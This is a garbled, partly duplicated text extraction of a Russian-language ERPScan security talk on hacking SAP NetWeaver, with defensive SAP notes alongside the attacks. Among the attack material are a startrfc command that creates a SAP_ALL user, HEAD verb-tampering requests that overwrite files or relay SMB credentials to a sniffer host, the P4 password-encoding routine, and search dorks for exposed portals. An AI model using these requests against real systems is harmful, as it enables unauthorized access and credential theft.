erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
